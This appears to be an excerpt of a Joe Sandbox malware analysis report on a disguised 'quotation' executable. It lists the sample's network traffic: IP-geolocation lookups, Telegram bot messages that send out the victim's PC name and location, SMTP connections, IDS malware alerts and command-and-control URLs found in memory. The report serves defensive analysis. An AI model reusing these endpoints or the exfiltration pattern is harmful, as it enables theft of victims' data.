                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49721 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49720 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49718 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49736 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49735 -> 104.21.112.1:443
                  Source: global trafficTCP traffic: 192.168.2.8:49752 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.8:60445 -> 208.91.198.143:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49716 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                  Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 12:05:53 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 12:05:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: vbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.0000000002701000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1660117333.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: vbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: vbc.exe, 0000000C.00000002.4058029996.00000000070D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enP
                  Source: vbc.exe, 00000007.00000002.4059070573.000000000752D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: vbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073BF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: vbc.exe, 00000007.00000002.4059070573.000000000742F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.00000000073E9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FCE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F89000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: vbc.exe, 0000000C.00000002.4058029996.00000000070F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007554000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
                  Source: vbc.exe, 00000007.00000002.4059070573.000000000755E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
